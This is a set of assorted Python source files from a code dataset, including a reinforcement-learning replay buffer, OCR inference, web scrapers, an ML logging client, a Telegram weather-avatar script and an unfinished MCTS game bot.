dtype=np.float32)\n self.r = np.zeros([size], dtype=np.float32)\n self.d = np.zeros([size], dtype=np.float32)\n\n self.filled = -1 # up to this index, the buffer is filled\n self.tail = 0 # index to which an experience to be stored next\n\n def __len__(self):\n return self.filled\n\n def append(self, s, r, s_next, done):\n self.s[self.tail] = s\n self.r[self.tail] = r\n self.sp[self.tail] = s_next\n # self.mu[self.tail] = mu\n self.d[self.tail] = done\n\n self.filled = max(self.filled, self.tail)\n self.tail += 1\n if self.tail == self.size:\n self.tail = 0\n\n def sample(self, truncated_steps):\n index = np.random.randint(low=truncated_steps, high=self.filled)\n\n s = np.vstack((self.s[index - truncated_steps:index], self.sp[None, index]))\n ret_tuple = (s,\n self.r[index - truncated_steps:index],\n self.d[index - truncated_steps:index])\n\n return ret_tuple\n\n\n\n\nclass SimpleMahjongBufferPER():\n # Record Episodes\n # Prioritized Experience Replay\n class SumTree:\n def __init__(self, size, scale):\n self.size = size\n self.scale = scale\n self.tree_nodes = np.zeros(2 * size, dtype=np.float32)\n\n def sum(self):\n return self.tree_nodes[1]\n\n def add(self, index, weight):\n index += self.size\n self.tree_nodes[index] = weight ** self.scale\n while index > 0:\n index = index // 2\n self.tree_nodes[index] = self.tree_nodes[index * 2] + self.tree_nodes[index * 2 + 1]\n\n def sample_subtree(self, root):\n if root >= self.size:\n return root - self.size, self.tree_nodes[root] / self.tree_nodes[1]\n pl = self.tree_nodes[root * 2]\n pr = self.tree_nodes[root * 2 + 1]\n s = pl + pr\n pl /= s\n pr /= s\n if random.random() < pl:\n return self.sample_subtree(root * 2)\n else:\n return self.sample_subtree(root * 2 + 1)\n\n def sample(self):\n if self.tree_nodes[1] == 0:\n raise Exception(\"Error! 
Sampling from empty buffer\")\n            return self.sample_subtree(1)\n\n    def __init__(self, size=1024, episode_length=256, priority_eps=10000,\n                 priority_scale=0.1, IS_scale=1.0, saved=None):\n        # Mahjong episode length usually <256\n        self.size = size\n        self.length = np.zeros([size,], dtype=int)  # plain int: the np.int alias is deprecated\n        self.s = np.zeros([size, episode_length, 34, 4, 1], dtype=np.float16)\n        self.r = np.zeros([size, episode_length], dtype=np.float32)\n        self.d = np.zeros([size, episode_length], dtype=np.float16)\n\n        self.IS_scale = IS_scale\n        self.priority_scale = priority_scale\n        self.priority_eps = priority_eps\n\n        self.filled_size = 0  # up to this index, the buffer is filled\n        self.tail = 0  # index at which the next experience will be stored\n\n        tree_size = 2 ** int(np.ceil(np.log2(size)))\n        self.sum_tree = SimpleMahjongBufferPER.SumTree(tree_size, priority_scale)\n        self.sum_steps = 0\n        self.min_length = 0\n        self.max_length = 0\n\n        # self.infinity = 1e9\n\n        # # initialize priority of saved episodes to inf\n        # for i in range(self.saved_size):\n        #     self.sum_tree.add(i, self.infinity)\n        #     length = self.length[i]\n        #     self.sum_steps += length\n        #     self.min_length = min(self.min_length, length)\n        #     self.max_length = max(self.max_length, length)\n\n    def append_episode(self, s, r, d, weight=0):\n        length = len(r)\n        self.s[self.tail, :length+1] = s\n        self.r[self.tail, :length] = r\n        self.d[self.tail, :length] = d\n        self.length[self.tail] = length\n\n        self.sum_tree.add(self.tail, weight + self.priority_eps)\n\n        self.tail = (self.tail + 1) % self.size\n        self.filled_size = min(self.filled_size + 1, self.size)\n\n\n    def sample_episode(self):\n        e_index, e_weight = self.sum_tree.sample()\n\n        d = self.d[e_index, :self.length[e_index]]\n        s = self.s[e_index, :self.length[e_index]+1]\n        r = self.r[e_index, :self.length[e_index]]\n        # pi = self.pi[e_index]\n\n        return s, r, d, self.length[e_index], e_index, e_weight\n\n    # def sample_episode_batch(self, batch_size=32):\n    #     states_b = []\n    #     actions_b = []\n    #     pi_b = []\n    #     r_b = []\n    #     done_b = []\n    #     length_b = []\n    #     mask_b = []\n    #     indices = []\n    #     weights = []\n    #     for i in range(batch_size):\n    #         states, actions, pi, r, done, length, mask, e_index, e_weight = self.sample_episode()\n    #         states_b.append(states)\n    #         actions_b.append(actions)\n    #         pi_b.append(pi)\n    #         r_b.append(r)\n    #         done_b.append(done)\n    #         length_b.append(length)\n    #         mask_b.append(mask)\n    #         indices.append(e_index)\n    #         weights.append((length/e_weight/self.sum_steps) ** self.IS_scale)\n    #\n    #     max_l = max(length_b)\n    #     states_b = np.stack(states_b, axis=0)[:, :max_l+1]\n    #     actions_b = np.stack(actions_b, axis=0)[:, :max_l]\n    #     pi_b = np.stack(pi_b, axis=0)[:, :max_l]\n    #     r_b = np.stack(r_b, axis=0)[:, :max_l]\n    #     done_b = np.stack(done_b, axis=0)\n    #     mask_b = np.stack(mask_b, axis=0)\n    #     weights_b = np.stack(weights, axis=0)\n    #\n    #     return states_b, actions_b, pi_b, r_b, done_b, length_b, mask_b, indices, weights_b","sub_path":"AI/buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"531651914","text":"import os\nimport sys\nimport time\nimport argparse\nimport numpy as np\nimport cv2\nimport torch\nfrom torch.autograd import Variable\n\nsys.path.append(os.getcwd())\nfrom .utils import utils\nfrom .Net import crnn_vgg\nfrom .config import config\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--image_path', type=str,\n                    
default='/home/lyb/ocr/text_det_reg/dataset/images_sentences1/images/000000_00_00.jpg',\n                    help='the path to your image')\nopt = parser.parse_args()\n\n\ndef get_alphabets(alphabet_path):\n    # Get the alphabet table\n    alphabets = utils.generate_alphabets(alphabet_path=alphabet_path)\n    nclass = len(alphabets) + 1\n    return nclass, alphabets\n\n\ndef process_image(image):\n    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n    dst = cv2.fastNlMeansDenoising(image, None, h=10, templateWindowSize=7, searchWindowSize=21)\n    ret, image = cv2.threshold(dst, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n    h, w = image.shape\n    image = cv2.resize(image, (0, 0), fx=config.imgH / h, fy=config.imgH / h, interpolation=cv2.INTER_CUBIC)\n    # Pad any shortfall with a white region\n    image = padding_image(image)\n\n    image = (np.reshape(image, (32, config.imgW, 1))).transpose(2, 0, 1)\n    # Preprocess and convert to a torch Tensor\n    image = preprocess(image)\n    return image\n\ndef padding_image(image_):\n    h, w = image_.shape\n    img = 255. * np.ones((config.imgH, config.imgW))\n    if w < config.imgW:\n        img[:, :w] = image_\n    else:\n        img = cv2.resize(image_, (config.imgW, config.imgH), interpolation=cv2.INTER_CUBIC)\n    img = np.uint8(img)\n    return img\n\ndef preprocess(image_):\n    image = image_.astype(np.float32) / 255.\n    image = torch.from_numpy(image).type(torch.FloatTensor)\n    image.sub_(config.mean).div_(config.std)\n    return image\n\n\ndef crnn_recognition(image, model, device, alphabets):\n    converter = utils.strLabelConverter(alphabets)\n    image = Variable(image)\n    image = image.to(device)\n\n    model.eval()\n    preds = model(image)  # (141, batch_size, 6773)\n\n    _, preds = preds.max(2)  # (141, batch_size)\n    preds = preds.transpose(1, 0).contiguous().view(-1)\n\n    preds_size = torch.IntTensor([preds.size(0)])\n    sim_pred = converter.decode(preds.data, preds_size.data, raw=False)\n    print('results: {0}'.format(sim_pred))\n    return 0\n\n\ndef infer_recognition(image_batch):\n    return 0\n\n\nif __name__ == '__main__':\n    nclass, alphabets = get_alphabets(alphabet_path='./dataset/alphabets.txt')\n\n    model = crnn_vgg.CRNN(32, 1, nclass, 256)\n    device = torch.device('cpu')\n    # device = torch.device('cuda:2') if torch.cuda.is_available() else torch.device('cpu')\n    model.to(device)\n    # crnn_model_path = './models/crnn_best.pth'\n    crnn_model_path = './models/crnn_Rec_ocr_50_0.00478125.pth'\n    print('===> loading pretrained model from {}'.format(crnn_model_path))\n    model.load_state_dict(torch.load(crnn_model_path, map_location='cpu'))\n    # model.load_state_dict(torch.load(crnn_model_path))\n\n    start_time = time.time()\n    # ------ set the image path here -------\n    image = cv2.imread(opt.image_path)\n    image = process_image(image)\n    image = image.view(1, *image.size())\n\n    crnn_recognition(image, model, device, alphabets)\n\n    finish_time = time.time()\n    print('elapsed time of recognition: {0}'.format(finish_time - start_time))\n\n\n\n","sub_path":"CRNN/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"64734394","text":"import socket\nimport threading\nimport sys\n\nfrom server import Server\nfrom client import Client\n\nif __name__ == \"__main__\":\n\n    if len(sys.argv) > 1:\n        if len(sys.argv) == 3:\n            try:\n                client = Client(sys.argv[1], int(sys.argv[2]))\n            except:\n                print(\"Error! 
Type a number.\")\n        else:\n            client = Client(sys.argv[1])\n    else:\n        server = Server()\n        server.run()\n","sub_path":"_python_chat/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"425714534","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFetch the hero list and the corresponding page URLs\n\"\"\"\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium import webdriver\nimport pandas as pd\n\ndriver = webdriver.PhantomJS(executable_path=r'D:/Program Files/phantomjs-2.1.1-windows/bin/phantomjs')\n\ndriver.get(\"http://pvp.qq.com/web201605/herolist.shtml\")\n\nheros_node=driver.find_elements_by_xpath('/html/body/div[3]/div/div/div[2]/div[2]/ul/li/a')\n\nhero_list=[]\nurl_list=[]\nfor node in heros_node:\n    hero_list.append(node.text)\n    url_list.append(node.get_attribute('href'))\n    \ndata=pd.DataFrame({'hero':hero_list,'url1':url_list})\n\ndriver.get('http://news.17173.com/z/pvp/yxtj/index.shtml')\n\nnodes=driver.find_elements_by_xpath('//*[@id=\"jsheroshow\"]/li/a')\n\nhero_list=[]\nurl_list=[]\nfor node in nodes:\n    hero_list.append(node.text)\n    url_list.append(node.get_attribute('href'))\n    \ntmp=pd.DataFrame({'hero':hero_list,'url2':url_list})\n\ndata=pd.merge(data,tmp,on='hero')\n\ndata.to_csv('D:/Python project/王者荣耀/url.csv')\ndriver.close() \n\n##4399\ndriver.get(\"http://news.4399.com/gonglue/wzlm/daoju/\")\nactions = ActionChains(driver)\nclick_node=driver.find_element_by_xpath('//*[@id=\"hero_more\"]/a')\nactions.click(click_node)\nactions.click(click_node)\nactions.perform()\nheros_node=driver.find_elements_by_xpath('//*[@id=\"hreo_list\"]/li/a')\n\nitem_list=[]\nurl_list=[]\nfor node in heros_node:\n    item_list.append(node.text)\n    url_list.append(node.get_attribute('href'))\n    \ndata=pd.DataFrame({'item':item_list,'url1':url_list}) \ndata.to_csv('D:/Python project/王者荣耀/item_url.csv') ","sub_path":"study/王者荣耀/爬虫代码/get_url.py","file_name":"get_url.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"80863873","text":"import time\nimport requests\nfrom typing import List, Dict\nfrom dataclasses import dataclass\nfrom arize import public_pb2 as pb\nfrom arize.utils.types import ModelTypes, Environments\n\n\n@dataclass(frozen=True)\nclass Schema:\n    prediction_id_column_name: str\n    feature_column_names: List[str]\n    timestamp_column_name: str = None\n    prediction_label_column_name: str = None\n    prediction_score_column_name: str = None\n    actual_label_column_name: str = None\n    shap_values_column_names: Dict[str, str] = None\n\n\nclass Client:\n    def __init__(\n        self,\n        api_key: str,\n        organization_key: str,\n        uri=\"https://api.arize.com/v1\"):\n        self._api_key = api_key\n        self._organization_key = organization_key\n        self._files_uri = uri + \"/files\"\n\n    def log(\n        self,\n        dataframe,\n        path: str,\n        model_id: str,\n        model_version: str,\n        batch_id: str,\n        model_type: ModelTypes,\n        environment: Environments,\n        schema: Schema\n    ):\n        col_idx = {col: idx for idx, col in enumerate(dataframe.columns)}\n        h = pb.FileHeader()\n\n        if model_type is None:\n            raise AttributeError(\"model_type is required\")\n\n        if environment is None:\n            raise AttributeError(\"environment is required\")\n\n        if environment is Environments.TRAINING:\n            if schema.prediction_label_column_name is None or schema.actual_label_column_name is None:\n                raise AttributeError(\"both prediction and actual label must be specified for Training 
environment\")\n if schema.shap_values_column_names is not None:\n raise AttributeError(\"shap_values are not supported for Training environments\")\n h.environment = pb.FileHeader.Environment.TRAINING\n elif environment is Environments.VALIDATION:\n if schema.prediction_label_column_name is None or schema.actual_label_column_name is None:\n raise AttributeError(\"both prediction and actual label must be specified for Validation environment\")\n if schema.shap_values_column_names is not None:\n raise AttributeError(\"shap_values are not supported for Validation environments\")\n if batch_id is None:\n raise AttributeError(\"batch_id is required for Validation environment\")\n h.environment = pb.FileHeader.Environment.VALIDATION\n elif environment is Environments.PRODUCTION:\n h.environment = pb.FileHeader.Environment.PRODUCTION\n else:\n raise AttributeError(f\"unknown environment {environment}\")\n\n with open(path, \"wb\") as f:\n header = h.SerializeToString()\n f.write(len(header).to_bytes(8, \"big\", signed=False))\n f.write(header)\n\n current_time = int(time.time())\n for row in dataframe.to_numpy():\n if Environments.TRAINING == environment:\n msg = pb.PreProductionRecord()\n r = msg.training_record.record\n elif Environments.VALIDATION == environment:\n msg = pb.PreProductionRecord()\n msg.validation_record.batch_id = batch_id\n r = msg.validation_record.record\n else:\n msg = pb.Record()\n r = msg\n\n r.prediction_id = row[col_idx[schema.prediction_id_column_name]]\n r.model_id = model_id\n\n t = (\n int(row[col_idx[schema.timestamp_column_name]])\n if schema.timestamp_column_name is not None\n else current_time\n )\n\n for feature_cn in schema.feature_column_names:\n row_val = row[col_idx[feature_cn]]\n feature_val = r.prediction.features[feature_cn]\n if isinstance(row_val, (str, bool)):\n feature_val.string = row_val\n elif isinstance(row_val, int):\n feature_val.int = row_val\n elif isinstance(row_val, float):\n feature_val.double = row_val\n\n if schema.prediction_label_column_name is not None:\n r.prediction.timestamp.seconds = t\n r.prediction.model_version = model_version\n if model_type is ModelTypes.SCORE_CATEGORICAL:\n r.prediction.label.score_categorical.categorical = row[\n col_idx[schema.prediction_label_column_name]\n ]\n r.prediction.label.score_categorical.score = row[\n col_idx[schema.prediction_score_column_name]\n ]\n elif model_type is ModelTypes.CATEGORICAL:\n r.prediction.label.categorical = row[\n col_idx[schema.prediction_label_column_name]\n ]\n elif model_type is model_type.NUMERIC:\n r.prediction.label.numeric = row[\n col_idx[schema.prediction_label_column_name]\n ]\n elif model_type is model_type.BINARY:\n r.prediction.label.binary = row[\n col_idx[schema.prediction_label_column_name]\n ]\n\n if schema.actual_label_column_name is not None:\n if model_type is ModelTypes.CATEGORICAL:\n r.actual.label.categorical = row[col_idx[schema.actual_label_column_name]]\n elif model_type is ModelTypes.NUMERIC:\n r.actual.label.numeric = row[col_idx[schema.actual_label_column_name]]\n elif model_type is ModelTypes.BINARY:\n r.actual.label.binary = row[col_idx[schema.actual_label_column_name]]\n elif model_type is ModelTypes.SCORE_CATEGORICAL:\n if isinstance(schema.actual_label_column_name, tuple):\n r.actual.label.score_categorical.categorical = row[col_idx[schema.actual_label_column_name[0]]]\n r.actual.label.score_categorical.score = row[col_idx[schema.actual_label_column_name[1]]]\n else:\n r.actual.label.score_categorical.categorical = 
row[col_idx[schema.actual_label_column_name]]\n\n if schema.shap_values_column_names is not None:\n for feature_name, shap_values_cn in schema.shap_values_column_names.items():\n row_val = row[col_idx[shap_values_cn]]\n r.feature_importances.feature_importances[feature_name] = row_val\n\n msg_bytes = msg.SerializeToString()\n f.write(len(msg_bytes).to_bytes(8, \"big\", signed=False))\n f.write(msg_bytes)\n return self._post_file(path)\n\n def _post_file(self, path):\n with open(path, \"rb\") as f:\n return requests.post(\n self._files_uri,\n data=f,\n headers={\n \"authorization\": self._api_key,\n \"organization\": self._organization_key,\n },\n )\n","sub_path":"arize/pandas/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"129588078","text":"# -*- coding: utf-8\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nreq = requests.get(\"http://www.keumyang.com/mall/KYDetail.ky?ps_goid=7942\")\nhtml = req.text\n# print(html)\nsoup = BeautifulSoup(html, \"html.parser\")\ninfo_ul = soup.select(\"div.detail_wine > div.detail_top > dl > dd > ul > li:nth-child(9) > span.txt\")\n\nprint(info_ul)\n\n","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"129604422","text":"from swampy.TurtleWorld import *\nimport math\n\ndef square( turtle, length ):\n for i in range(4):\n fd( turtle, length )\n lt( turtle ) \n\ndef polygon( turtle, n, length ):\n for i in range(n):\n fd( turtle, length )\n lt( turtle, 360.0 / n ) \n\ndef circle( turtle, r ):\n n = 360\n alpha = 360.0 / n\n alpha = alpha * math.pi / 180.0\n length = math.sqrt( 2 * r * r * ( 1.0 - math.cos( alpha ) ) )\n polygon( turtle, n, length )\n\ndef arc( turtle, r, angle ):\n n = 360\n alpha = 360.0 / n\n alpha = alpha * math.pi / 180.0\n length = math.sqrt( 2 * r * r * ( 1.0 - math.cos( alpha ) ) )\n for i in range( angle ):\n fd( turtle, length )\n lt( turtle, 360.0 / n ) \n\nworld = TurtleWorld()\nbob = Turtle()\nbob.delay = 0.01\n\n#square( bob, 100 )\n\n#polygon( bob, 6, 100 )\n\n#circle( bob, 100 )\n\narc( bob, 100, 135 )\n\nwait_for_user()","sub_path":"swampy/mypolygon.py","file_name":"mypolygon.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"410000879","text":"from talkingdata.feat2 import *\nimport gc\nimport time\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport catboost as cb\nimport lightgbm as lgb\nfrom sklearn.metrics import roc_auc_score,log_loss\n\n\ninplace = False\ndata_path = 'C:/Users/cui/Desktop/python/talkingdata/data/'\n\n\ntrain = pd.read_hdf(data_path + 'train.hdf')\ntest = pd.read_hdf(data_path + 'test.hdf')\nsubmission = pd.DataFrame({'click_id':test.click_id})\ntest['is_attributed'] = 0\ndata = train.append(test.drop('click_id',axis=1))\ndata = pre_treatment(data,'sub_data')\ndel train,test\ngc.collect()\n\ntrain_feat = pd.DataFrame()\nfor date in [7,8,9]:\n train_feat_sub = make_feat(data[data['date']==date].copy(),\n data,'{}_sub'.format(date))\n train_feat_sub = train_feat_sub[train_feat_sub['is_attributed'] == 1].append(\n train_feat_sub[train_feat_sub['is_attributed'] == 0].sample(frac=0.1, random_state=66))\n train_feat = train_feat.append(train_feat_sub)\n del train_feat_sub\n gc.collect()\n\ntest_feat = 
make_feat(data[data['date']==10].copy(),\n                                   data,'{}_sub'.format(10))\n\n\n\npredictors = [c for c in train_feat.columns if c not in ['app_count','channel_count',\n                                                         'click_time','date','ip','is_attributed']]\n# predictors = ['app', 'device', 'os', 'channel', 'hour','ip_count','device_count','os_count',\n#               'ip_group_rank1','ip_group_rank2','ip_group_rank2']\n\nprint('Start training...')\nparams = {\n    'task': 'train',\n    'boosting_type': 'gbdt',\n    'objective': 'binary',\n    'metric': 'auc',\n    'max_depth': 8,\n    'num_leaves': 32,\n    'learning_rate': 0.01,\n    'subsample': 0.7,\n    'colsample_bytree': 0.7,\n    'feature_fraction': 0.9,\n    'bagging_fraction': 0.95,\n    'bagging_freq': 5,\n    'verbose': 0,\n    'seed': 66,\n}\nlgb_train = lgb.Dataset(train_feat[predictors], train_feat.is_attributed)\nlgb_test = lgb.Dataset(test_feat[predictors], test_feat.is_attributed,reference=lgb_train)\n\ngbm = lgb.train(params,lgb_train,3000)\n\nprint('Start predicting...')\npreds = gbm.predict(test_feat[predictors])\nsubmission['is_attributed'] = preds\nsubmission.to_csv('C:/Users/cui/Desktop/python/talkingdata/sub{}.csv'.format(\n    datetime.datetime.now().strftime('%Y%m%d_%H%M%S')), index=False,float_format='%.4f')\n\n\n","sub_path":"talkingdata/submission_all.py","file_name":"submission_all.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"433523758","text":"from urllib.request import urlopen\nimport json\n\nwhile True:\n    id_game= str(input(\"Enter game id:\"))\n    if id_game.lower() == \"exit\":\n        break\n    elif id_game.isdigit() == False:\n        print(\"Enter game id!\")\n    else:\n        url = f\"https://store.steampowered.com/api/appdetails?appids={id_game}&cc=vn\"\n\n        #1. Open connection\n        conn = urlopen(url)\n\n        #2. Read data\n        raw_data = conn.read()\n\n        #3. 
Decode data\n        text = raw_data.decode(\"utf-8\")\n        data = json.loads(text)\n\n        if data[id_game][\"success\"]:\n            sub_info = data[id_game][\"data\"][\"package_groups\"][0][\"subs\"]\n            for i in sub_info:\n                game_name = i[\"option_text\"]\n                price = (int(i[\"price_in_cents_with_discount\"])/100) * 0.78\n                print(game_name)\n                print(\"Selling price:\", price)\n                print(\"**********************\")\n        else:\n            print(\"Invalid game id\")\n","sub_path":"session5/aqi.py","file_name":"aqi.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"650923780","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom telethon import TelegramClient, sync\nfrom telethon.tl.functions.photos import UploadProfilePhotoRequest, DeletePhotosRequest\nimport requests\nimport socks\nfrom PIL import ImageDraw, Image, ImageFont\nimport time\nimport os\n\ncelsius = '°'\nTEMP_PATH = 'temperature_images'\nREADY_PATH = 'ready_images'\nWEATHER_PATH = 'weather_images'\n\nlocation = 498817  # Saint-Petersburg\nopenweather_api_key = 'abcdefghi'\n\ntelegram_api_id = 1234567\ntelegram_api_hash = 'abcdefghi'\n\nFONT_SIZE = 80\nTEXT_Y_POSITION = 80\n\n#proxy options\n#w = input('Which: ')\n\nhost = '127.0.0.1'  # a valid host\nport = 9050  # a valid port\nproxy = (socks.SOCKS5, host, port)\n\nicons = [\"01d\", \"02d\", \"03d\", \"04d\", \"09d\", \"10d\", \"11d\", \"13d\", \"50d\", \"01n\", \"02n\", \"03n\", \"04n\", \"09n\", \"10n\", \"11n\", \"13n\", \"50n\"]\n\n# create all avatars\nprint('Start of temperature images generation')\nfor temperature in range(-99, 99, 1):\n    raw = Image.new('RGBA', (200, 200), \"gray\")\n    parsed = ImageDraw.Draw(raw)\n    length = len(str(temperature))\n    if length == 1:\n        x_start = 70\n    if length == 2:\n        x_start = 40\n    if length == 3:\n        x_start = 30\n\n    font = ImageFont.truetype(\"arial.ttf\", FONT_SIZE)\n    parsed.text((x_start, TEXT_Y_POSITION), f'{temperature}{celsius}', align=\"center\", font=font)\n    raw.save(f'{TEMP_PATH}/{temperature}.png', \"PNG\")\nprint('Generation finished')\n\nprint('Beginning icons download')\nfor ic in icons:\n    url = f'http://openweathermap.org/img/wn/{ic}@2x.png'\n    r = requests.get(url)\n    with open(f'{WEATHER_PATH}/{ic}.png', 'wb') as f:\n        f.write(r.content)\n        r.raise_for_status()\nprint('Download successful')\n\nprint('Generate_final_images')\nfor temperature_file in os.listdir(f'{TEMP_PATH}'):\n    if temperature_file.endswith(\".png\"):\n        new_im = Image.open(f'{TEMP_PATH}/{temperature_file}')\n        for weather_file in os.listdir(f'{WEATHER_PATH}'):\n            if weather_file.endswith(\".png\"):\n                im = Image.open(f'{WEATHER_PATH}/{weather_file}')\n                test_img = Image.composite(im, new_im, im)\n                temperature_file = temperature_file.strip('.png')\n                weather_file = weather_file.replace('.png','')\n                test_img.save(f'{READY_PATH}/{temperature_file}_{weather_file}.png')\nprint('done')\n\ndef get_temperature(weather_data):\n    return round(weather_data['main']['temp'])\ndef get_conditions(weather_data):\n    weath_array = weather_data['weather']\n    weath_dict = weath_array[0]\n    return weath_dict['icon']\n\n\ndef get_weather(location, api_key):\n    url = f'https://api.openweathermap.org/data/2.5/weather?id={location}&units=metric&appid={api_key}'\n    r = requests.get(url)\n    return r.json()\n\n\nclient = TelegramClient('1', telegram_api_id, telegram_api_hash)\n#client = TelegramClient('anon', telegram_api_id, telegram_api_hash, proxy=(socks.SOCKS5, '127.0.0.1', 9050))\nclient.connect()\n\n\nclient.start()\n\nlast_temperature = -274\n\nwhile 
True:\n weather_data = get_weather(location, openweather_api_key)\n temperature = get_temperature(weather_data)\n conditions = get_conditions(weather_data)\n print(last_temperature, temperature)\n if temperature == last_temperature:\n time.sleep(15 * 60)\n continue\n\n client(DeletePhotosRequest(client.get_profile_photos('me')))\n file = client.upload_file(f'{READY_PATH}/{temperature}_{conditions}.png')\n client(UploadProfilePhotoRequest(file))\n last_temperature = temperature\n time.sleep(15 * 60)","sub_path":"change_avatar.py","file_name":"change_avatar.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"112234328","text":"\nfrom mcts_node import MCTSNode\nfrom random import choice\nimport random\nfrom timeit import default_timer as time\nfrom math import sqrt, log\n#how do we improve our algorithm?\n#why does backpropagate not work?\n#The flip(i.e how do we use the function for the opponent)\n#is rollout correct?\nnum_nodes = 10\nexplore_faction = 2.\n\nROLLOUTS = 1000\nMAX_DEPTH = 5\n\ndef traverse_nodes(node, board, state, identity):\n \"\"\" Traverses the tree until the end criterion are met.\n Args:\n node: A tree node from which the search is traversing.\n board: The game setup.\n state: The state of the game.\n identity: The bot's identity, either 'red' or 'blue'.\n Returns: A node from which the next stage of the search can proceed.\n \"\"\"\n\n # For first node, will pick root because it is also leaf node\n # UCB - X is how many times won over how many times played (visited)\n # x = node.wins/node.visits (if visits != 0)\n # C is hardcoded, we can choose. Lower C value is exploitation, higher is exploration.\n # Try C = 2\n # Use highest UCB to choose each node down a path until leaf_node is reached\n turn = identity\n current = node\n # index = 0\n # while len(current.child_nodes) != 0:\n # for action in current.child_nodes:\n # current = current.child_nodes[action]\n # print(\"index: \", index)\n # print(\"action: \", action)\n # index += 1\n ucb = {}\n\n temp = node\n max_ucb = 0\n\n i = 0\n updatestate = state\n # a = len(current.child_nodes)\n while len(current.child_nodes) != 0:\n for action in current.child_nodes:\n # print(i)\n i = i +1\n if current.child_nodes[action].visits == 0 :\n #print(len(current.child_nodes))\n child = current.child_nodes[action]\n exploitation = child.wins/child.visits\n\n exploration = 2 * (sqrt((2 * log(child.parent.visits))/ child.visits))\n\n ucb[child] = exploitation + exploration\n\n if ucb[child] > max_ucb:\n max_ucb = ucb[child]\n temp = child \n \n if turn == 1:\n turn = 2\n elif turn == 2:\n turn = 1\n current = current.child_nodes[action]\n updatestate = board.next_state(updatestate, action)\n\n\n leaf_node = current\n\n return leaf_node\n # Hint: return leaf_node\n\n\n\ndef expand_leaf(node, board, state):\n \"\"\" Adds a new leaf to the tree by creating a new child node for the given node.\n Args:\n node: The node for which a child will be added.\n board: The game setup.\n state: The state of the game.\n Returns: The added child node.\n \"\"\"\n\n # Create new node from parent node\n # Can choose action randomly\n # Action list comes from node.untried_actions?\n parent_node = node \n actions1 = board.legal_actions(state)\n state2 = board.next_state(state, actions1[0])\n actions2 = board.legal_actions(state2)\n #print(actions[0])\n # print(\"this is the length before \",len(parent_node.child_nodes) )\n child_node = 
MCTSNode(parent=parent_node, parent_action=actions1[0], action_list=board.legal_actions(state2))\n try:\n parent_node.child_nodes[actions2[0]] = child_node\n except: \n return child_node\n parent_node.child_nodes[actions1[0]] = child_node\n #print(\"it broke\", actions2, \"also :\", actions1)\n # print(\"this is the length after\",len(parent_node.child_nodes) )\n return child_node\n\n \n # Hint: return new_node\n\n\ndef rollout(board, state):\n \"\"\" Given the state of the game, the rollout plays out the remainder randomly.\n Args:\n board: The game setup.\n state: The state of the game.\n return state/ board at the end - see who won\n \"\"\"\n\n # Return who won this game (board or state)\n # board.is_ended(state) == true when over\n # Same as Rollout bot, can basically copy/paste\n # pass\n if not board.is_ended(state):\n prevmov = board.legal_actions(state)[0]\n nextmove = prevmov\n predistance = float('inf')\n while not board.is_ended(state):\n predistance = float('inf')\n\n for move in board.legal_actions(state):\n if move == prevmov:\n\n continue\n x1 = move[2]\n x2 = prevmov[2]\n y1 = move[3]\n y2 = prevmov[3]\n if prevmov[1]!= move[1] or prevmov[0]!= move[0]:\n distance = sqrt((x1 - x2) ** 2 + (y2 - y1) ** 2 + (move[0] - prevmov[0]) ** 2 + (move[1] - prevmov[1]) ** 2) * 0.5\n else:\n distance = sqrt((x1 - x2) ** 2 + (y2 - y1) ** 2) * 0.5\n \n if predistance >distance:\n predistance = distance\n nextmove = move\n prevmov = nextmove\n state = board.next_state(state,nextmove)\n\n return board.current_player(state)\n\n\ndef backpropagate(node, won):\n \"\"\" Navigates the tree from a leaf node to the root, updating the win and visit count of each node along the path.\n \n Args:\n node: A leaf node.\n won: An indicator of whether the bot won or lost the game.\n \"\"\"\n if node.parent == None:\n node.visits += 1\n node.wins += won\n return node\n node.wins += won\n node.visits += 1\n\n return backpropagate(node.parent, won)\n\n\ndef think(board, state):\n \"\"\" Performs MCTS by sampling games and calling the appropriate functions to construct the game tree.\n Args:\n board: The game setup.\n state: The state of the game.\n Returns: The action to be taken.\n \"\"\"\n identity_of_bot = board.current_player(state)\n root_node = MCTSNode(parent=None, parent_action=None, action_list=board.legal_actions(state))\n i = 0\n start = time()\n currenttime = 0\n\n for step in range(num_nodes):\n # Copy the game for sampling a playthrough\n sampled_game = state\n times = time()\n currenttime = times -start\n # Start at root\n #print(\"this is the length : \",len(root_node.child_nodes))\n\n leaf_node = traverse_nodes(root_node, board, sampled_game, identity_of_bot)\n child_node = expand_leaf(leaf_node, board, state)\n if len(child_node.untried_actions) == 0:\n print(\"drawsss\")\n bestAction = child_node.parent_action\n break\n parent_node = 